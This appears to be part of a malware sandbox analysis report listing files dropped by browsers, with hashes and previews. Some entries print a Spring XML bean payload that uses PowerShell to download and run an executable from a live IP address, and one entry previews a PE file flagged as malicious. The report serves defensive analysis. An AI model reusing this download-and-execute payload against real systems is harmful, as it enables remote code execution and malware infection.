              SHA-256:37FABD0B7AB065ECAF481064D770A2DBF61A8C23F6BE1E10D2085812ADB0EC8A
              SHA-512:66ACA2AA2BC4DB901250DA2DAD0202352D89CD8C1A16616F106FF73D0EED2E1EC4852940443BAFDFAAB264AF1185769B33E240BB94E8B263AA5B0D6AF16CFB10
              Malicious:true
              Reputation:unknown
              Preview:'use strict';function m(){return function(){}}var p;function aa(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}}var ba="function"==typeof Object.defineProperties?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a};.function ca(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");}var q=ca(this);function t(a,b){if(b)a:{var c=q;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&null!=b&&ba(c,a,{configurable:!0,writable:!0,value:b})}}.t("Symbol",function(a){function b(f){if(this instanceof b)throw new TypeError("Symbol is not a constructor");return new c(d+(f||"")+"_"+e++,f)}function c(f,g){this.g=f;ba(this,"description",{configurable:!
              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):2397
              Entropy (8bit):5.424093225335539
              Encrypted:false
              SSDEEP:
              MD5:A71CE16FE7E71948777A01794E461DE4
              SHA1:51310DF56DBDEC1329DB8946888A208B477712CA
              SHA-256:431EBF00F6BAB228FBAD80663CAAE73427516D6AB3D34939ECB6DCB5D0A566CC
              SHA-512:EAA2513BCA54F184083CD6E50738EF99D8C5C562075D5237E5B5A23DDA8DA694A7B0F0E9251C7C9A3BE2BD51614CCEBF32127F4CC9C49DDA9A7036434E7D5AAB
              Malicious:false
              Reputation:unknown
              Preview:{.. "author": {.. "email": "docs-hosted-app-own@google.com".. },.. "background": {.. "persistent": false,.. "scripts": [ "eventpage_bin_prod.js" ].. },.. "content_capabilities": {.. "matches": [ "https://docs.google.com/*", "https://drive.google.com/*", "https://drive-autopush.corp.google.com/*", "https://drive-daily-0.corp.google.com/*", "https://drive-daily-1.corp.google.com/*", "https://drive-daily-2.corp.google.com/*", "https://drive-daily-3.corp.google.com/*", "https://drive-daily-4.corp.google.com/*", "https://drive-daily-5.corp.google.com/*", "https://drive-daily-6.corp.google.com/*", "https://drive-preprod.corp.google.com/*", "https://drive-staging.corp.google.com/*" ],.. "permissions": [ "clipboardRead", "clipboardWrite", "unlimitedStorage" ].. },.. "content_security_policy": "script-src 'self'; object-src 'self'",.. "default_locale": "en_US",.. "description": "__MSG_extDesc__",.. "externally_connectable": {.. "matches": [ "htt
              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):291
              Entropy (8bit):4.644891151983713
              Encrypted:false
              SSDEEP:
              MD5:EE9839F99DED6F38DC561DB846B51E80
              SHA1:DD2128A473C2FF47471400C81EFF416285DE606E
              SHA-256:06E08E421EB7F0FE7959D68E27D40A9146A54503090D95CFAC6F2FFD72A78769
              SHA-512:C8D77607F00CB8012CD056CE61CB77918EC43621270511303E09577F89CC57D4954E22E2C8C3FB1029AAE29F8142DAAE2E938CD5590AD0E5DE6DB1208AFEF874
              Malicious:true
              Reputation:unknown
              Preview:(function(){window._docs_chrome_extension_exists=!0;window._docs_chrome_extension_features_version=2;window._docs_chrome_extension_permissions="alarms clipboardRead clipboardWrite storage unlimitedStorage offscreen".split(" ");window._docs_chrome_extension_manifest_version=2;}).call(this);.
              Process:C:\Program Files\Internet Explorer\iexplore.exe
              File Type:data
              Category:dropped
              Size (bytes):16384
              Entropy (8bit):0.059756571176746306
              Encrypted:false
              SSDEEP:
              MD5:601EB8FE9A31BF4D0C4AD5C8C88B304A
              SHA1:D87B09CE0A2B336A13FDFE5B9ECC8F253D378C94
              SHA-256:C67016AA89735C3338302E7E276DA17B641030B099DC0EE4AE08FBB003EFB73C
              SHA-512:B335D7307B2E8D66D34299D6F415D3C398CD41642DFA160D5BAD18D2A8792C7ECF130C9495A45FF9F93107BA084F491C5CC77020B03A2A3D49A21D8E8E42E071
              Malicious:false
              Reputation:unknown
              Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
              Process:C:\Program Files\Internet Explorer\iexplore.exe
              File Type:data
              Category:dropped
              Size (bytes):16384
              Entropy (8bit):0.08484621349867416
              Encrypted:false
              SSDEEP:
              MD5:28672E7EFC26774B8AD74C362FC0F782
              SHA1:0E1C51CC210BFB75A07B6DE76A10B4D50A8C246E
              SHA-256:F442DD4EB7C69EC74F2DA4C9A2B5E820889A4E3F9BEF8E8B295A30D121FA2BCA
              SHA-512:0BB49E5CDF456C30C7941D0036F8763FABFC3BBEF5BD8302C3BAC56E379C7032E9727D92DAD8922981F5C1C6C7331D27AA7FDC4BA56B9C0129E116F976D2011B
              Malicious:false
              Reputation:unknown
              Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
              Process:C:\Program Files\Internet Explorer\iexplore.exe
              File Type:data
              Category:dropped
              Size (bytes):16384
              Entropy (8bit):0.09245091920483794
              Encrypted:false
              SSDEEP:
              MD5:664C79BEEBB91CE1F21AF975F096D41F
              SHA1:69EB8236D5808DB1C037CBAA8CB3A2A05318D428
              SHA-256:92182FDEC37072EC1C83DEB7732876E433403F55952131B1A5CC7C3810A98801
              SHA-512:73086EDD8AFA36B56A2A35AB9F75FE87AC5841D9FAD138FD6F7616DCBEF5FCB0A1AEF19195CEA01302B9A6867540FF26A54FBAAAA1EEEF6AFAD869722B399FFE
              Malicious:false
              Reputation:unknown
              Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Jan 31 09:57:21 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
              Category:dropped
              Size (bytes):2677
              Entropy (8bit):3.9892515216998135
              Encrypted:false
              SSDEEP:
              MD5:F23B6E6B8C2BE9C696C31AAFB58D23F1
              SHA1:AA14C8FEE1048ABE4230F9BC98752558C179FE0F
              SHA-256:C77E8578FCA1E28B9D95A23396C3327068436717EA5E7F8887BCBBCC8FA2158F
              SHA-512:1364352EF16F1F2BD177952790158CC04565FD297DCDB83FF87269D5C867E98515D2E0DCA916594A844E16CDACF02F0BDA87CDA002DAB027DBED95E8435FFFD7
              Malicious:false
              Reputation:unknown
              Preview:L..................F.@.. ...$+.,....-....j......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.I]X.W....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V]X)W....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.V]X)W....M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.V]X)W...........................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V]X+W...........................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............J......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Jan 31 09:57:21 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
              Category:dropped
              Size (bytes):2679
              Entropy (8bit):4.0058290433666945
              Encrypted:false
              SSDEEP:
              MD5:6C33F974F7C3EF5E7489B55670B1DE5E
              SHA1:D56642CF40AAF96FDC5106EA839B97AD8AB67F31
              SHA-256:6AF5B0BF1EE336F8695D8A1548E970E727361404A467FC7A23C72D3B3B788A86
              SHA-512:C8F1824A4C085CAB49C4D24FE938DA91EC49DE7C4092A69370B48ABC55A33520F2772E3330670BA53608807F248E6EAC224D55270FDDEA4FB7894CB2F74E295D
              Malicious:false
              Reputation:unknown
              Preview:L..................F.@.. ...$+.,.........j......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.I]X.W....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V]X)W....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.V]X)W....M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.V]X)W...........................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V]X+W...........................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............J......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 6 08:54:41 2023, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
              Category:dropped
              Size (bytes):2693
              Entropy (8bit):4.014570609540053
              Encrypted:false
              SSDEEP:
              MD5:B3915CAAFA686F95C9ED92B60739EAA1
              SHA1:0BA8CADF062EE6A6DC79C741F73BEF66D3A7DD12
              SHA-256:C99F86A378D83703548FCC56D20B9D3616DF3D8509835E2BA37189900B76277F
              SHA-512:EC14658701BBE54D2FB3907631F0E5C81D22ED517137135527145BF67A14184946E1EBAFC8202C8B5B52373E47920011B7AC7BA3465EF3E2D33E60757CBDC586
              Malicious:false
              Reputation:unknown
              Preview:L..................F.@.. ...$+.,.....v. ;.......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.I]X.W....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V]X)W....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.V]X)W....M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.V]X)W...........................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.VFW.N...........................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............J......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Jan 31 09:57:21 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
              Category:dropped
              Size (bytes):2681
              Entropy (8bit):4.004074495794722
              Encrypted:false
              SSDEEP:
              MD5:47C00A3A804A37CC3982F94CE42291BB
              SHA1:1F834EE3C4460092A7D4646D245178E6FFB3485E
              SHA-256:2DB6DF17D160C93643B75D2224C07B7C986B080D675FCFA33AE049753291CD60
              SHA-512:957C20E84B92F355D7C9F7349684AA21068FF802910E1B8CDC1BB01A7A16E32871B01D3DBAC9CD34427B72F55AB30E3298A2E019C7CB62E51853AC0AA7D18793
              Malicious:false
              Reputation:unknown
              Preview:L..................F.@.. ...$+.,....$....j......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.I]X.W....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V]X)W....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.V]X)W....M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.V]X)W...........................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V]X+W...........................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............J......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Jan 31 09:57:21 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
              Category:dropped
              Size (bytes):2681
              Entropy (8bit):3.9895022202993133
              Encrypted:false
              SSDEEP:
              MD5:DB50F6500E7ABC2427DF4D8CBDADE9AA
              SHA1:1E695D8A870F05EDEE91B85EDFFF865D1D8A7C65
              SHA-256:5754C9E6433D2807EE8FB1A5DDA23DC7B0DC31189763F449BFAADC1BE89383F7
              SHA-512:88F9695433F46047DEFE7A3AB55551ECAE33ED4BB08B033D467111BAB249531DE3B4B94B1FC3813BC651C5BBB83A84EC184EBD798CA980B31B3EBB5366509A63
              Malicious:false
              Reputation:unknown
              Preview:L..................F.@.. ...$+.,....\;...j......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.I]X.W....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V]X)W....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.V]X)W....M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.V]X)W...........................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V]X+W...........................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............J......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Jan 31 09:57:21 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
              Category:dropped
              Size (bytes):2683
              Entropy (8bit):4.003792915856677
              Encrypted:false
              SSDEEP:
              MD5:BAD3C098591EF350F232B746B2B7933E
              SHA1:AD07E10B7FC764B808376CF8845503B7AA71AFF5
              SHA-256:DDABD55A9A20499740F448D53F5E98B5259B193DEFC080A7355AFA97538366D0
              SHA-512:AFB16AF1B3F7194C018309CE12772F01EF3360764B5A2DEBE99762DE0B94DB92D811AFA161FC8A9A0C567B30216DC32BA785E96ED8883AEC7B0AA2EE42CFECA5
              Malicious:false
              Reputation:unknown
              Preview:L..................F.@.. ...$+.,...._....j......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.I]X.W....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V]X)W....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.V]X)W....M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.V]X)W...........................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V]X+W...........................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............J......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              File Type:PE32+ executable (console) x86-64, for MS Windows
              Category:dropped
              Size (bytes):326144
              Entropy (8bit):7.959039332406397
              Encrypted:false
              SSDEEP:
              MD5:91807225181F95317A20DF820AF456BF
              SHA1:55B5D6656A7C9A32475DD666F88FAD5A94E7745C
              SHA-256:FED4CE59E1E70926027787FDA845FDA417779E7E2CC59DC1AD7B23071BC28C07
              SHA-512:275F2A51A3B46FF4C4C95C35ED407E056018C690F3F1750DE9EB5744FC1C32153F1B4144219C8BDBB050EB273A6AE166C1288BD6E7162EF014FF2AC7E9658322
              Malicious:true
              Antivirus:
              • Antivirus: Avira, Detection: 100%
              • Antivirus: Joe Sandbox ML, Detection: 100%
              • Antivirus: Avira, Detection: 100%
              • Antivirus: Joe Sandbox ML, Detection: 100%
              • Antivirus: Avira, Detection: 100%
              • Antivirus: Joe Sandbox ML, Detection: 100%
              Reputation:unknown
              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........X[..95.95.95.A..95.7G0.95.7G1.95.7G6.95.7G4.95..A4.95.94..95.F<.95.F6.95.F..95.F7.95.Rich.95.........................PE..d...vt.e.........."....$. ...........%.........@.............................@............`.................................................|?....... .......................0..X....6..p............................4..@............0...............................text............ .................. ..`.rdata..$....0.......$..............@..@.data...H....P.......@..............@....pdata..............................@..@.rsrc........ ......................@..@.reloc..X....0......................@..B........................................................................................................................................................................................................................................
              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):0
              Entropy (8bit):0.0
              Encrypted:false
              SSDEEP:
              MD5:1DB215890D9490D5AF4A1FF3632985C1
              SHA1:2BD4E96106B7B0B1FB1FEFC73CB8816093605FF5
              SHA-256:083B8D647EE52DAAE0BC9BD31AB44F50FA87F902B5636BFBA990A06C5B894AAD
              SHA-512:03A9DA3C183BEDF611C1F4BB8CEA7555B46F2E09B686F896ED16B3A3DA168F5B88FAE29630352DAD8DCEC5150905FA3ACEF804CE6BE5ECD04895373E4B807DB2
              Malicious:false
              Reputation:unknown
              Preview:<?xml version="1.0" encoding="UTF-8" ?>.. <beans xmlns="http://www.springframework.org/schema/beans".. xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance".. xsi:schemaLocation=".. http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">.. <bean id="pb" class="java.lang.ProcessBuilder" init-method="start">.. <constructor-arg >.. <list>.. <value>cmd</value>.. <value>/c</value>.. <value>powershell Invoke-WebRequest "http://213.109.202.222:80/download/xml.exe" -OutFile "xml.exe"; Start-Process "./xml.exe"</value>.. </list>.. </constructor-arg>.. </bean>.. </beans>
              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              File Type:PE32+ executable (console) x86-64, for MS Windows
              Category:dropped
              Size (bytes):0
              Entropy (8bit):0.0
              Encrypted:false
              SSDEEP:
              MD5:91807225181F95317A20DF820AF456BF
              SHA1:55B5D6656A7C9A32475DD666F88FAD5A94E7745C
              SHA-256:FED4CE59E1E70926027787FDA845FDA417779E7E2CC59DC1AD7B23071BC28C07
              SHA-512:275F2A51A3B46FF4C4C95C35ED407E056018C690F3F1750DE9EB5744FC1C32153F1B4144219C8BDBB050EB273A6AE166C1288BD6E7162EF014FF2AC7E9658322
              Malicious:true
              Reputation:unknown
              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........X[..95.95.95.A..95.7G0.95.7G1.95.7G6.95.7G4.95..A4.95.94..95.F<.95.F6.95.F..95.F7.95.Rich.95.........................PE..d...vt.e.........."....$. ...........%.........@.............................@............`.................................................|?....... .......................0..X....6..p............................4..@............0...............................text............ .................. ..`.rdata..$....0.......$..............@..@.data...H....P.......@..............@....pdata..............................@..@.rsrc........ ......................@..@.reloc..X....0......................@..B........................................................................................................................................................................................................................................
              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):743
              Entropy (8bit):4.80857466827084
              Encrypted:false
              SSDEEP:
              MD5:1DB215890D9490D5AF4A1FF3632985C1
              SHA1:2BD4E96106B7B0B1FB1FEFC73CB8816093605FF5
              SHA-256:083B8D647EE52DAAE0BC9BD31AB44F50FA87F902B5636BFBA990A06C5B894AAD
              SHA-512:03A9DA3C183BEDF611C1F4BB8CEA7555B46F2E09B686F896ED16B3A3DA168F5B88FAE29630352DAD8DCEC5150905FA3ACEF804CE6BE5ECD04895373E4B807DB2
              Malicious:false
              Reputation:unknown
              Preview:<?xml version="1.0" encoding="UTF-8" ?>.. <beans xmlns="http://www.springframework.org/schema/beans".. xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance".. xsi:schemaLocation=".. http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">.. <bean id="pb" class="java.lang.ProcessBuilder" init-method="start">.. <constructor-arg >.. <list>.. <value>cmd</value>.. <value>/c</value>.. <value>powershell Invoke-WebRequest "http://213.109.202.222:80/download/xml.exe" -OutFile "xml.exe"; Start-Process "./xml.exe"</value>.. </list>.. </constructor-arg>.. </bean>.. </beans>
              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              File Type:PE32+ executable (console) x86-64, for MS Windows
              Category:dropped
              Size (bytes):0
              Entropy (8bit):0.0
              Encrypted:false
              SSDEEP:
              MD5:91807225181F95317A20DF820AF456BF
              SHA1:55B5D6656A7C9A32475DD666F88FAD5A94E7745C
              SHA-256:FED4CE59E1E70926027787FDA845FDA417779E7E2CC59DC1AD7B23071BC28C07
              SHA-512:275F2A51A3B46FF4C4C95C35ED407E056018C690F3F1750DE9EB5744FC1C32153F1B4144219C8BDBB050EB273A6AE166C1288BD6E7162EF014FF2AC7E9658322
              Malicious:true
              Reputation:unknown
              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........X[..95.95.95.A..95.7G0.95.7G1.95.7G6.95.7G4.95..A4.95.94..95.F<.95.F6.95.F..95.F7.95.Rich.95.........................PE..d...vt.e.........."....$. ...........%.........@.............................@............`.................................................|?....... .......................0..X....6..p............................4..@............0...............................text............ .................. ..`.rdata..$....0.......$..............@..@.data...H....P.......@..............@....pdata..............................@..@.rsrc........ ......................@..@.reloc..X....0......................@..B........................................................................................................................................................................................................................................
              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):0
              Entropy (8bit):0.0
              Encrypted:false
              SSDEEP:
              MD5:1DB215890D9490D5AF4A1FF3632985C1
              SHA1:2BD4E96106B7B0B1FB1FEFC73CB8816093605FF5
              SHA-256:083B8D647EE52DAAE0BC9BD31AB44F50FA87F902B5636BFBA990A06C5B894AAD
              SHA-512:03A9DA3C183BEDF611C1F4BB8CEA7555B46F2E09B686F896ED16B3A3DA168F5B88FAE29630352DAD8DCEC5150905FA3ACEF804CE6BE5ECD04895373E4B807DB2
              Malicious:false
              Reputation:unknown
              Preview:<?xml version="1.0" encoding="UTF-8" ?>.. <beans xmlns="http://www.springframework.org/schema/beans".. xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance".. xsi:schemaLocation=".. http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">.. <bean id="pb" class="java.lang.ProcessBuilder" init-method="start">.. <constructor-arg >.. <list>.. <value>cmd</value>.. <value>/c</value>.. <value>powershell Invoke-WebRequest "http://213.109.202.222:80/download/xml.exe" -OutFile "xml.exe"; Start-Process "./xml.exe"</value>.. </list>.. </constructor-arg>.. </bean>.. </beans>
              No static file info